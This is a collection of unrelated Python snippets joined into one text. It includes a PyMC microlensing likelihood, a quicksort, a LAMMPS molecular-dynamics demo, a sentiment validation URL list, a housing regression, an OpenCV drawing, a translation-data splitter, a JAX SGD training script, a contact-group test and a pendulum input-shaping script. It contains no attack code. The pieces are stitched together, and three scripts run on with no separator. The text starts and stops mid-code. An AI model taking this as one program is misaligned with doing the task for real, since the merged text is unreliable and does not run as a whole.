        mag = (u ** 2 + 2) / (u * T.sqrt(u ** 2 + 4))
        # Compute the mean model
        mean = f * F_base * mag + (1 - f) * F_base
        # We allow for rescaling of the error bars by a constant factor
        c = BoundedNormal_1(
            "c",
            mu=T.ones(n_bands),
            sd=2.0 * T.ones(n_bands),
            testval=1.5,
            shape=(n_bands),
        )
        # Diagonal terms of the covariance matrix
        var_F = (c * self.sig_F) ** 2
        # Per-event Gaussian log-likelihood term.
        ll_single = self.compute_log_likelihood(self.F - mean, var_F)
        # Compute additional term for the likelihood: average the hyperprior
        # over the posterior samples of the population hyperparameters.
        lam_ln_A0 = samples_tensor[:, 0]
        mu_ln_delta_t0 = samples_tensor[:, 1]
        sig_ln_delta_t0 = samples_tensor[:, 2]
        mu_ln_tE = samples_tensor[:, 3]
        sig_ln_tE = samples_tensor[:, 4]
        alpha_f = samples_tensor[:, 5]
        beta_f = samples_tensor[:, 6]
        # Iterate over samples from hyperparameters
        prior_ln_A0 = pm.Exponential.dist(lam_ln_A0).logp(ln_A0)
        prior_ln_delta_t0 = pm.Normal.dist(mu=mu_ln_delta_t0, sd=sig_ln_delta_t0).logp(
            ln_delta_t0
        )
        prior_ln_tE = pm.Normal.dist(mu=mu_ln_tE, sd=sig_ln_tE).logp(ln_tE)
        if fit_blending == True:
            prior_f = pm.Beta.dist(alpha_f, beta_f).logp(f)
            ll_hyper = T.log(
                T.sum(T.exp(prior_ln_A0 + prior_ln_tE + prior_ln_delta_t0 + prior_f))
            )
        else:
            ll_hyper = T.log(
                T.sum(T.exp(prior_ln_A0 + prior_ln_tE + prior_ln_delta_t0))
            )
        # BUG FIX: the log-likelihood terms were computed but never
        # registered with the model, so sampling ignored the data entirely.
        # Attach the combined likelihood as a Potential, matching the other
        # model classes in this module.
        pm.Potential("log_likelihood", ll_single + ll_hyper)
|
#!/usr/bin/env python3
# Count words in a line of user input by counting separating spaces.
text = input("Enter string: ")
n = text.count(" ")
# One more word than there are separators.
# NOTE(review): consecutive/leading/trailing spaces inflate the count;
# len(text.split()) would be robust — confirm the intended semantics.
n = n + 1
print(n)
|
import random
# Test input: 5-30 random integers in [1, 100].
liste = [random.randrange(1,101,1) for _ in range(random.randrange(5,31,1))]
print("entrée : ", liste)
def quicksorting(array):
    """Sort *array* ascending with quicksort (last element as pivot).

    Returns the list; slices are sorted on copies and written back, so
    the input list object ends up sorted in place as well.
    """
    if len(array) == 0:
        return array
    boundary = 0
    pivot_idx = len(array) - 1
    # Lomuto partition: move everything smaller than the pivot behind
    # the boundary, then drop the pivot onto the boundary itself.
    for idx in range(len(array)):
        if array[idx] < array[pivot_idx]:
            array[idx], array[boundary] = array[boundary], array[idx]
            boundary += 1
        elif idx == pivot_idx:
            array[boundary], array[pivot_idx] = array[pivot_idx], array[boundary]
    # Recurse on both sides of the pivot's final position.
    array[:boundary] = quicksorting(array[:boundary])
    array[boundary + 1:] = quicksorting(array[boundary + 1:])
    return array
print("sortie : ", quicksorting(liste)) |
"""Demonstration of the SimPhoNy Lammps-md Wrapper usingCUDS."""
from __future__ import print_function
import numpy
from simphony import CUBA, CUDS, Simulation
from simphony.cuds.meta import api
from simphony.cuds.particles import Particle, Particles
from simphony.engine import EngineInterface
# ########################################################
# Preprocessing step ######
# Create initial PARTICLES ######
# can be replaced with the crystal tools in common. ######
# ########################################################
# The lattice parameter (in a cubic setup)
a_latt = 1.549
# Use a SC unit cell with basis for the FCC system
unit_cell = [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
# The basis of the FCC system in the SC setup:
basis = [
    [0.0, 0.0, 0.0],
    [0.5, 0.5, 0.0],
    [0.5, 0.0, 0.5],
    [0.0, 0.5, 0.5]
]
# The number of periodic images, or duplications of the unit cell in
# each cubic lattice direction
N_dup = [4, 4, 4]
# total number of atoms after duplication
natoms = len(basis) * N_dup[0] * N_dup[1] * N_dup[2]
# create a Data set CUDS component named test
pc = Particles("Test")
# pc = api.Particles(name="Test", particle=None, bond=None)
i = 0
pos = [0, 0, 0]
atoms1 = basis
atoms = list()
# Replicate the basis along each of the three lattice directions in
# turn: after pass i, atoms1 holds the positions duplicated N_dup[i]
# times along direction i (in fractional unit-cell coordinates).
# loop over the super cell (unit cell) directions
for i in range(0, 3):
    # loop over the duplicates (repetitions)
    for idup in range(0, N_dup[i]):
        # loop over the number of atoms in the basis.
        for j in range(0, len(atoms1)):
            pos = [0, 0, 0]
            for k in range(0, 3):
                pos[k] = idup * unit_cell[i][k] + atoms1[j][k]
            atoms.append(pos)
    # Promote this pass's result to be the input of the next pass.
    atoms1 = atoms
    atoms = []
# have seed so the validation can be reproduced
numpy.random.seed(42)
input_particles = []
for pos in atoms1:
    # Scale the fractional coordinates by the lattice parameter.
    pos2 = [pos[0] * a_latt, pos[1] * a_latt, pos[2] * a_latt]
    p = Particle(coordinates=pos2)
    # p = api.Particle(position=pos2)
    # Usually, user asks the MD program to initialize the velocities
    # according to a Maxwell-Boltzmann distribution. In this example
    # we define a uniform random distribution, the MD algorithm will
    # in any case result in a MB one quickly.
    p.data[CUBA.VELOCITY] = [
        numpy.random.uniform(-0.5, 0.5),
        numpy.random.uniform(-0.5, 0.5),
        numpy.random.uniform(-0.5, 0.5)
    ]
    pc.add([p])
    input_particles.append(p)
# Calculate the velocity of center of mass and reset it to zero to
# avoid drift of the whole system.
v_cm = [0, 0, 0]
for p in pc.iter(item_type=CUBA.PARTICLE):
    v_cm[0] += p.data[CUBA.VELOCITY][0]
    v_cm[1] += p.data[CUBA.VELOCITY][1]
    v_cm[2] += p.data[CUBA.VELOCITY][2]
number_of_points = pc.count_of(CUBA.PARTICLE)
v_cm[0] /= number_of_points
v_cm[1] /= number_of_points
v_cm[2] /= number_of_points
# Subtract the mean velocity from every particle.
for p in pc.iter(item_type=CUBA.PARTICLE):
    p.data[CUBA.VELOCITY][0] -= v_cm[0]
    p.data[CUBA.VELOCITY][1] -= v_cm[1]
    p.data[CUBA.VELOCITY][2] -= v_cm[2]
######################################
# define a material:
mat = api.Material(name='a_material')
# give it a (shared) material property
mat.data[CUBA.MASS] = 1.0
# mark all particles in pc to belong to mat:
for p in pc.iter(item_type=CUBA.PARTICLE):
    p.data[CUBA.MATERIAL] = mat
# define a cuds to hold the computational model:
cuds = CUDS(name='fluid')
cuds.add([mat])
# add pc and mat to it.
cuds.add([pc])
# create a simulation box CUDS component, and add it as a CUDS
# component:
box = api.Box(name='simulation_box')
# Box vectors: unit-cell vectors scaled by duplication count and the
# lattice parameter.
super_cell = [
    tuple(N_dup[i] * x * a_latt for x in v) for i, v in enumerate(unit_cell)]
box.vector = super_cell
cuds.add([box])
# create a molecular dynamics model (NVE with temperature rescaling)
md_nve = api.MolecularDynamics(name='md_test')
# add the physics equation to the CUDS computational model.
cuds.add([md_nve])
# or in one statement: cuds.add(MD(name='mdnve'))
# create a empty thermostat as a general material relation
thermo = api.TemperatureRescaling(material=[mat], name='tempscale')
thermo.description = 'a simple temperature rescaling test'
# scale the temperature from 0 to 1
thermo.temperature = [0.0, 1.0]
# this is in time units, not steps.
thermo.coupling_time = 0.000025
# add the thermostat to the CUDS computational model.
thermo.material = [mat]
cuds.add([thermo])
# create a new solver component:
sp = api.SolverParameter(name='solverParameters')
# NOTE(review): the SolverParameter is created twice (duplicate
# statement below) and `sp` is never added to `cuds` — confirm whether
# it is needed at all.
# create a new solver component:
sp = api.SolverParameter(name='solverParameters')
# integration time:
itime = api.IntegrationTime(name="md_nve_integration_time")
itime.time = 0.0
itime.step = 0.0025
itime.final = 10.25
cuds.add([itime])
verlet = api.Verlet(name="Verlet")
cuds.add([verlet])
# define periodic boundary condition
pbc = api.Periodic(name='pbc')
cuds.add([pbc])
# attache this to the boundaries of the box:
box = cuds.get_by_name('simulation_box')
# NOTE(review): the first entry is fetched from cuds by name while the
# other two reuse the local `pbc` object directly — confirm these are
# the same object.
box.condition = [cuds.get_by_name('pbc'), pbc, pbc]
cuds.update([box])
# define the interatomic force as material relation
lj = api.LennardJones_6_12([mat, mat], name='LennardJones')
lj.cutoff_distance = 2.5
lj.energy_well_depth = 1.0
lj.van_der_waals_radius = 1.0
# lj.material = [cuds.get('mat'), cuds.get('mat')]
cuds.add([lj])
# initialization of the simulation
sim = Simulation(cuds, "LAMMPS", engine_interface=EngineInterface.Internal)
sim.run()
# After the first run, add a Nose-Hoover thermostat heating the system
# from T=1.0 to T=1.2.
thermo = api.NoseHoover(name='thermo')
thermo.temperature = [1.0, 1.2]
thermo.coupling_time = 0.00000025
thermo.material = [cuds.get(mat.uid)]
cuds.add([thermo])
pc = cuds.get_by_name('Test')
# pc is now a proxy to the pc in the "wrapper" managed by the sim.
# Perturb one particle's velocity, push the change back through the
# proxy, and continue the simulation.
particle = pc.get(input_particles[0].uid)
particle.data[CUBA.VELOCITY] = [
    numpy.random.uniform(-0.5, 0.5),
    numpy.random.uniform(-0.5, 0.5),
    numpy.random.uniform(-0.5, 0.5)
]
pc.update([particle])
sim.run()
|
## Onur Yilmaz
## CENG 463 - Term Project
## File for validation list creation
## Import for file operation
import yaml
## List of (review-page URL, gold sentiment label) pairs used for validation
validationList = [
    ('http://www.beyazperde.com/filmler/film-145397/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-214686/elestiriler-beyazperde/', 'NEGATIVE'),
    ('http://www.beyazperde.com/filmler/film-54343/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-193101/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-190267/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-201797/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-176279/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-145646/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-205375/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-203662/elestiriler-beyazperde/', 'NEGATIVE'),
    ('http://www.beyazperde.com/filmler/film-198903/elestiriler-beyazperde/', 'NEGATIVE'),
    ('http://www.beyazperde.com/filmler/film-196306/elestiriler-beyazperde/', 'NEUTRAL'),
    ('http://www.beyazperde.com/filmler/film-209296/elestiriler-beyazperde/', 'NEGATIVE'),
    ('http://www.beyazperde.com/filmler/film-194879/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-185999/elestiriler-beyazperde/', 'NEUTRAL'),
    ('http://www.beyazperde.com/filmler/film-145646/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-190794/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-195834/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-132874/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-192858/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-192067/elestiriler-beyazperde/', 'NEGATIVE'),
    ('http://www.beyazperde.com/filmler/film-178980/elestiriler-beyazperde/', 'NEUTRAL'),
    ('http://www.beyazperde.com/filmler/film-146622/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-128188/elestiriler-beyazperde/', 'NEUTRAL'),
    ('http://www.beyazperde.com/filmler/film-183369/elestiriler-beyazperde/', 'NEUTRAL'),
    ('http://www.beyazperde.com/filmler/film-203597/elestiriler-beyazperde/', 'NEGATIVE'),
    ('http://www.beyazperde.com/filmler/film-190799/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-181443/elestiriler-beyazperde/', 'NEGATIVE'),
    ('http://www.beyazperde.com/filmler/film-185970/elestiriler-beyazperde/', 'NEUTRAL'),
    ('http://www.beyazperde.com/filmler/film-141564/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-187864/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-140459/elestiriler-beyazperde/', 'NEGATIVE'),
    ('http://www.beyazperde.com/filmler/film-205984/elestiriler-beyazperde/', 'NEUTRAL'),
    ('http://www.beyazperde.com/filmler/film-196699/elestiriler-beyazperde/', 'NEGATIVE'),
    ('http://www.beyazperde.com/filmler/film-201649/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-205968/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-178179/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-182404/elestiriler-beyazperde/', 'NEGATIVE'),
    ('http://www.beyazperde.com/filmler/film-196676/elestiriler-beyazperde/', 'NEUTRAL'),
    ('http://www.beyazperde.com/filmler/film-183144/elestiriler-beyazperde/', 'NEUTRAL'),
    ('http://www.beyazperde.com/filmler/film-146628/elestiriler-beyazperde/', 'NEGATIVE'),
    ('http://www.beyazperde.com/filmler/film-204106/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-197153/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-186349/elestiriler-beyazperde/', 'NEUTRAL'),
    ('http://www.beyazperde.com/filmler/film-188159/elestiriler-beyazperde/', 'NEGATIVE'),
    ('http://www.beyazperde.com/filmler/film-189944/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-144687/elestiriler-beyazperde/', 'NEGATIVE'),
    ('http://www.beyazperde.com/filmler/film-201209/elestiriler-beyazperde/', 'NEGATIVE'),
    ('http://www.beyazperde.com/filmler/film-175594/elestiriler-beyazperde/', 'POSITIVE'),
    ('http://www.beyazperde.com/filmler/film-136181/elestiriler-beyazperde/', 'POSITIVE'),
]
# Saving the list as YAML.
# FIX: the original used the Python-2-only `file()` builtin and the `print`
# statement, both removed in Python 3. `open()` inside a `with` block also
# guarantees the handle is closed even if yaml.dump raises.
with open('validationList.yaml', 'w') as file_writing:
    yaml.dump(validationList, file_writing)
print("Done!")
## End of code
|
__author__ = 'Kostya'
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import LinearRegression
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt

# Boston housing dataset: whitespace-separated values, no header row.
# FIX: use a raw string for the separator -- '\s' inside a plain literal is
# an invalid escape sequence (SyntaxWarning on modern Python).
df = pd.read_csv('https://archive.ics.uci.edu/ml/machine-learning-databases/housing/housing.data',
                 header=None, sep=r'\s+')
df.columns = ['CRIM', 'ZN', 'INDUS', 'CHAS',
              'NOX', 'RM', 'AGE', 'DIS', 'RAD',
              'TAX', 'PTRATIO', 'B', 'LSTAT', 'MEDV']
# Regress median home value (MEDV) on % lower-status population (LSTAT).
X = df[['LSTAT']].values
y = df['MEDV'].values
plt.scatter(X, y)
r = LinearRegression()
# Quadratic polynomial fit.
quad = PolynomialFeatures(degree=2)
X_q = quad.fit_transform(X)
r.fit(X_q, y)
# Smooth x-grid used for plotting both fitted curves.
X_arg = np.arange(X.min(), X.max(), 1)[:, np.newaxis]
plt.plot(X_arg, r.predict(quad.fit_transform(X_arg)), color='green', lw=2)
# Cubic polynomial fit (re-uses the same LinearRegression instance).
trip = PolynomialFeatures(degree=3)
X_t = trip.fit_transform(X)
r.fit(X_t, y)
plt.plot(X_arg, r.predict(trip.fit_transform(X_arg)), color='red', lw=2)
sns.pairplot(df[['LSTAT', 'INDUS', 'NOX', 'RM', 'MEDV', 'TAX', 'RAD']])
plt.show()
import cv2 as cv
import numpy as np
# Canvas dimensions: 640x480, 3 bytes per pixel (BGR).
width = 640
height = 480
bpp = 3
# Black image buffer.
img = np.zeros((height, width, bpp), np.uint8)
img_h = img.shape[0]
img_w = img.shape[1]
img_bpp = img.shape[2]  # number of channels
# Draw two diagonal lines across the canvas: green and red, 3 px thick.
cv.line(img, (width-1, 0), (0, height-1), (0, 255, 0), 3)
cv.line(img, (0, 0), (width-1, height-1), (0, 0, 255), 3)
cv.imshow("result", img)
cv.waitKey(0)
import os
# Input: STAPLE en-hu gold translations and the AWS baseline predictions.
folder_path = "/Users/hzguo/11785/group/dataverse_files/staple-2020-train/en_hu"
gold_file = folder_path + "/" +"train.en_hu.2020-01-13.gold.txt"
baseline_file = folder_path + "/" + "train.en_hu.aws_baseline.pred.txt"
# Output: train/test/val split folders.
output_folder = "/Users/hzguo/11785/group/en_hu"
train_folder = output_folder + "/" + "train" + "/"
test_folder = output_folder + "/" + "test" + "/"
val_folder = output_folder + "/" + "val" + "/"
train_prop = 0.9  # fraction of prompts used for training
try:
    os.mkdir(train_folder)
    os.mkdir(test_folder)
    os.mkdir(val_folder)
except :
    # Folders may already exist; note any other failure is silently ignored too.
    pass
# prompt_dict: prompt_id -> [prompt_text, [(accepted_translation, weight), ...],
#                            baseline prediction line(s), newline included]
prompt_dict = {}
prompt_id = None
max_list_length = 0  # longest accepted-translation list seen
with open(gold_file, "r") as f1, open(baseline_file, "r") as f2:
    # Pass 1: gold file. A length-1 line (bare "\n") terminates a record.
    for line in f1:
        if len(line) == 1:
            if prompt_id is not None:
                prompt_dict[prompt_id] = [prompt_text, prompt_accept]
                max_list_length = max(max_list_length, len(prompt_accept))
                prompt_id = None
            continue
        if prompt_id is None:
            # Header line: "<prompt_id>|<prompt text>"; [:-1] drops the newline.
            parts = line.split("|")
            prompt_id = parts[0]
            prompt_text = parts[1][:-1]
            prompt_accept = []
        else:
            # Accepted translation line: "<translation>|<weight>"
            parts = line.split("|")
            prompt_accept.append((parts[0], float(parts[1])))
    # Flush the final record (file may not end with a blank line).
    if prompt_id is not None:
        prompt_dict[prompt_id] = [prompt_text, prompt_accept]
        prompt_id = None
    # Pass 2: baseline predictions, appended as extra list elements.
    for line in f2:
        if len(line) == 1:
            prompt_id = None
            continue
        if prompt_id is None:
            parts = line.split("|")
            prompt_id = parts[0]
            prompt_text = parts[1][:-1]
            assert(prompt_text == prompt_dict[prompt_id][0])
        else:
            prompt_dict[prompt_id].append(line)
prompt_id_list = [k for k in prompt_dict.keys()]
# 90/10 split; the held-out 10% is reused for both val and test below.
train_number = int(len(prompt_id_list)*train_prop)
train_prompt_id_list = prompt_id_list[:train_number]
test_prompt_id_list = prompt_id_list[train_number:]
def write_train_file(folder_name, prompt_id_list):
    """Write chained src/tgt training pairs for the given prompts.

    Pair i maps translation 2*i-1 (or the baseline prediction when i == 0)
    onto translation 2*i, one line per prompt per round.
    """
    with open(folder_name + "src.txt", "w") as f1, open(folder_name + "tgt.txt", "w") as f2:
        for i in range(int((max_list_length+1)/2)):
            for prompt_id in prompt_id_list:
                id0 = 2*i
                id1 = 2*i+1
                if id1-1 < len(prompt_dict[prompt_id][1]):
                    # NOTE(review): the trailing + "\n" binds only to the else
                    # branch; prompt_dict[prompt_id][2] is a raw file line that
                    # appears to keep its own newline -- confirm this precedence
                    # is intended.
                    f1.write(prompt_dict[prompt_id][2] if id0 == 0 else prompt_dict[prompt_id][1][id0-1][0] + "\n")
                    f2.write(prompt_dict[prompt_id][1][id1-1][0] + "\n")
def write_test_file(folder_name, prompt_id_list):
    """Write test files: src gets "id|baseline line", tgt gets the prompt
    header plus every accepted translation with its weight, records separated
    by a blank line."""
    src_path = folder_name + "src.txt"
    tgt_path = folder_name + "tgt.txt"
    with open(src_path, "w") as src_file, open(tgt_path, "w") as tgt_file:
        for pid in prompt_id_list:
            entry = prompt_dict[pid]
            # entry[2] is a raw baseline line and already ends with a newline.
            src_file.write("{}|{}".format(pid, entry[2]))
            tgt_file.write("{}|{}\n".format(pid, entry[0]))
            for accepted in entry[1]:
                tgt_file.write("{}|{}\n".format(accepted[0], accepted[1]))
            tgt_file.write("\n")
# Emit the three dataset splits; val and test share the held-out prompt ids.
write_train_file(train_folder, train_prompt_id_list)
write_train_file(val_folder, test_prompt_id_list)
write_test_file(test_folder, test_prompt_id_list)
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run SGD training on a cloud TPU. We are not using data augmentation."""
import os
from jax import numpy as jnp
import jax
import tensorflow.compat.v2 as tf
import argparse
import time
from collections import OrderedDict
from bnn_hmc import data
from bnn_hmc import models
from bnn_hmc import nn_loss
from bnn_hmc import train_utils
from bnn_hmc import checkpoint_utils
from bnn_hmc import cmd_args_utils
from bnn_hmc import tabulate_utils
# Command-line interface; common flags (dir, seed, dataset, model, tpu_ip,
# use_float64, weight_decay, ...) come from cmd_args_utils.
parser = argparse.ArgumentParser(description="Run SGD on a cloud TPU")
cmd_args_utils.add_common_flags(parser)
parser.add_argument("--init_step_size", type=float, default=1.e-6,
                    help="Initial SGD step size")
parser.add_argument("--num_epochs", type=int, default=300,
                    help="Total number of SGD epochs iterations")
parser.add_argument("--batch_size", type=int, default=80, help="Batch size")
parser.add_argument("--momentum_decay", type=float, default=0.9,
                    help="Momentum decay parameter for SGD")
parser.add_argument("--eval_freq", type=int, default=10,
                    help="Frequency of evaluation (epochs)")
parser.add_argument("--save_freq", type=int, default=50,
                    help="Frequency of checkpointing (epochs)")
args = parser.parse_args()
# Configure JAX for the requested TPU and precision before any computation.
train_utils.set_up_jax(args.tpu_ip, args.use_float64)
def train_model():
    """Train the configured model with momentum SGD and a cosine LR schedule.

    Builds the run directory from the hyper-parameters, restores or randomly
    initializes state, then runs epochs with periodic TensorBoard logging,
    checkpointing (every --save_freq epochs) and evaluation (every
    --eval_freq epochs). Reads the module-level `args`.
    """
    # Run directory name encodes the hyper-parameters for easy comparison.
    subdirname = "sgd_wd_{}_stepsize_{}_batchsize_{}_momentum_{}_seed_{}".format(
        args.weight_decay, args.init_step_size, args.batch_size, args.momentum_decay,
        args.seed)
    dirname = os.path.join(args.dir, subdirname)
    os.makedirs(dirname, exist_ok=True)
    tf_writer = tf.summary.create_file_writer(dirname)
    cmd_args_utils.save_cmd(dirname, tf_writer)
    dtype = jnp.float64 if args.use_float64 else jnp.float32
    train_set, test_set, num_classes = data.make_ds_pmap_fullbatch(
        args.dataset_name, dtype)
    net_apply, net_init = models.get_model(args.model_name, num_classes)
    log_likelihood_fn = nn_loss.make_xent_log_likelihood(num_classes, 1.)
    log_prior_fn, _ = (
        nn_loss.make_gaussian_log_prior(args.weight_decay, 1.))
    num_data = jnp.size(train_set[1])
    num_batches = num_data // args.batch_size
    num_devices = len(jax.devices())
    total_steps = num_batches * args.num_epochs
    lr_schedule = train_utils.make_cosine_lr_schedule(
        args.init_step_size, total_steps)
    optimizer = train_utils.make_optimizer(
        lr_schedule, momentum_decay=args.momentum_decay)
    checkpoint_dict, status = checkpoint_utils.initialize(
        dirname, args.init_checkpoint)
    if status == checkpoint_utils.InitStatus.INIT_RANDOM:
        key, net_init_key = jax.random.split(jax.random.PRNGKey(args.seed), 2)
        print("Starting from random initialization with provided seed")
        # Initialize from a single example; replicate state across devices.
        init_data = jax.tree_map(lambda elem: elem[0][:1], train_set)
        params, net_state = net_init(net_init_key, init_data, True)
        opt_state = optimizer.init(params)
        net_state = jax.pmap(lambda _: net_state)(jnp.arange(num_devices))
        key = jax.random.split(key, num_devices)
        start_iteration = 0
    else:
        start_iteration, params, net_state, opt_state, key = (
            checkpoint_utils.parse_sgd_checkpoint_dict(checkpoint_dict))
        if status == checkpoint_utils.InitStatus.INIT_CKPT:
            print("Resuming the run from the provided init_checkpoint")
            # TODO: fix -- we should only load the parameters in this case
        elif status == checkpoint_utils.InitStatus.LOADED_PREEMPTED:
            print("Continuing the run from the last saved checkpoint")
    sgd_train_epoch, evaluate = train_utils.make_sgd_train_epoch(
        net_apply, log_likelihood_fn, log_prior_fn, optimizer, num_batches)
    for iteration in range(start_iteration, args.num_epochs):
        # One SGD epoch over the full training set.
        start_time = time.time()
        params, net_state, opt_state, logprob_avg, key = sgd_train_epoch(
            params, net_state, opt_state, train_set, key)
        iteration_time = time.time() - start_time
        # Row for the console progress table; eval columns filled below.
        tabulate_dict = OrderedDict()
        tabulate_dict["iteration"] = iteration
        tabulate_dict["step_size"] = lr_schedule(opt_state[-1].count)
        tabulate_dict["train_logprob"] = logprob_avg
        tabulate_dict["train_acc"] = None
        tabulate_dict["test_logprob"] = None
        tabulate_dict["test_acc"] = None
        tabulate_dict["time"] = iteration_time
        with tf_writer.as_default():
            tf.summary.scalar("train/log_prob_running", logprob_avg, step=iteration)
            tf.summary.scalar("hypers/step_size", lr_schedule(opt_state[-1].count),
                              step=iteration)
            tf.summary.scalar("debug/iteration_time", iteration_time, step=iteration)
        # Periodic checkpoint (and always at the final epoch).
        if iteration % args.save_freq == 0 or iteration == args.num_epochs - 1:
            checkpoint_name = checkpoint_utils.make_checkpoint_name(iteration)
            checkpoint_path = os.path.join(dirname, checkpoint_name)
            checkpoint_dict = checkpoint_utils.make_sgd_checkpoint_dict(
                iteration, params, net_state, opt_state, key)
            checkpoint_utils.save_checkpoint(checkpoint_path, checkpoint_dict)
        # Periodic evaluation on both splits (and always at the final epoch).
        if (iteration % args.eval_freq == 0) or (iteration == args.num_epochs - 1):
            test_log_prob, test_acc, test_ce, _ = evaluate(params, net_state,
                                                           test_set)
            train_log_prob, train_acc, train_ce, prior = (
                evaluate(params, net_state, train_set))
            tabulate_dict["train_logprob"] = train_log_prob
            tabulate_dict["test_logprob"] = test_log_prob
            tabulate_dict["train_acc"] = train_acc
            tabulate_dict["test_acc"] = test_acc
            with tf_writer.as_default():
                tf.summary.scalar("train/log_prob", train_log_prob, step=iteration)
                tf.summary.scalar("test/log_prob", test_log_prob, step=iteration)
                tf.summary.scalar("train/log_likelihood", train_ce, step=iteration)
                tf.summary.scalar("test/log_likelihood", test_ce, step=iteration)
                tf.summary.scalar("train/accuracy", train_acc, step=iteration)
                tf.summary.scalar("test/accuracy", test_acc, step=iteration)
        table = tabulate_utils.make_table(
            tabulate_dict, iteration - start_iteration, args.tabulate_freq)
        print(table)
if __name__ == "__main__":
    # Show the accelerator topology before starting the run.
    print("JAX sees the following devices:", jax.devices())
    train_model()
|
import random
from model.models import Contact
from model.models import Group
def test_del_contact_in_group(app, db):
    """Removing a contact from a group shrinks that group membership by one.

    Preconditions are created on demand: at least one contact, at least one
    group, and at least one contact assigned to a group.
    """
    if len(db.get_contact_list()) == 0:
        app.contact.create(Contact(firstname="Vlad", lastname="hater"))
    if len(db.get_group_list()) == 0:
        app.group.create(Group(name="test"))
    # BUGFIX: the original sampled random.choice() from
    # db.get_contacts_in_group() *before* checking whether that list was
    # empty, so the emptiness guard was dead code and the test crashed with
    # IndexError on an empty database. Establish the membership first.
    if len(db.get_contacts_in_group()) == 0:
        contact = random.choice(db.get_contact_list())
        group = random.choice(db.get_group_list())
        app.contact.add_contact_to_group(contact.id, group.id)
    group = random.choice(db.get_groups_with_contacts())
    group_id = group.id
    contact = random.choice(db.get_contacts_in_group())
    contact_id = contact.id
    old_contacts = db.get_contacts_in_group()
    app.contact.del_contact_in_group(contact_id, group_id)
    new_contacts = db.get_contacts_in_group()
    assert len(old_contacts) - 1 == len(new_contacts)
|
'''
This code is intended to serve as a basic example for a pendulum disturbed by a trolley
'''
# import all appropriate modules
import numpy as np
from scipy.integrate import odeint
import InputShaping as shaping
import nonzero_shaper as nz_shape
# Define Constants
G = 9.81  # gravitational acceleration [m/s^2]
DEG_TO_RAD = np.pi / 180  # degrees -> radians conversion factor
# ODE Solver characteristics (absolute/relative tolerances and max step for odeint)
abserr = 1.0e-9
relerr = 1.0e-9
max_step = 0.01
def response(X0, t, p, Distance):
    '''
    Generate the response of a pendulum disturbed by a trolley.

    Inputs:
        X0 - initial state [theta, theta_dot, x, x_dot]
        t - simulation time array
        p - packed parameters: (C, l, StartTime, x_init, x_fin, t_step, Shaper)
        Distance - array of trolley move distances to sweep over

    Returns:
        response - odeint solution for the *last* (Distance, StartTime)
                   combination only (each iteration overwrites it)
        Amp - residual amplitude matrix, rows indexed by distance,
              columns by start time
    '''
    # Unpack the constraints and initial conditions
    C, l, StartTime, x_init,x_fin, t_step, Shaper = p
    # Determine the natural frequency
    omega_n = np.sqrt(G/ l) # rad/s
    # The InputShaping module does a Hertz to Radians conversion.
    omega_n /= (2 * np.pi) # Hz
    # Assume the system is undamped
    zeta = 0.
    #Determine the step at which the command is initiated
    Start_step = (StartTime / t_step).astype(int)
    # Initialize
    unshaped_input = np.zeros_like(t)
    print('Distance: {}'.format(Distance))
    # Matrix of residual amplitudes per unique distance and StartTime
    Amp = np.zeros([len(Distance),len(StartTime)])
    #Iterate through the distance and starttime vectors
    for i in np.arange(0,len(Distance)):
        for j in np.arange(0,len(StartTime)):
            # NOTE(review): this local shadows the function's own name and is
            # overwritten by the odeint call below.
            response = np.zeros([len(t),len(X0)])
            # Create an unshaped input
            unshaped_input[Start_step[j]:-1] = shaping.bang_bang(
                t[Start_step[j]:-1], C[0], C[1], Distance[i], StartTime[j]
            )
            sys_in = np.zeros_like(unshaped_input)
            # Generate a shaped command
            if Shaper == 'UMZV Shaped':
                in_shape = shaping.UMZV(omega_n, zeta).shaper
                sys_in[Start_step[j]:-1] = shaping.shaped_input(
                    shaping.bang_bang, t[Start_step[j]:-1],in_shape,
                    C[0],C[1],Distance[i], StartTime[j]
                )
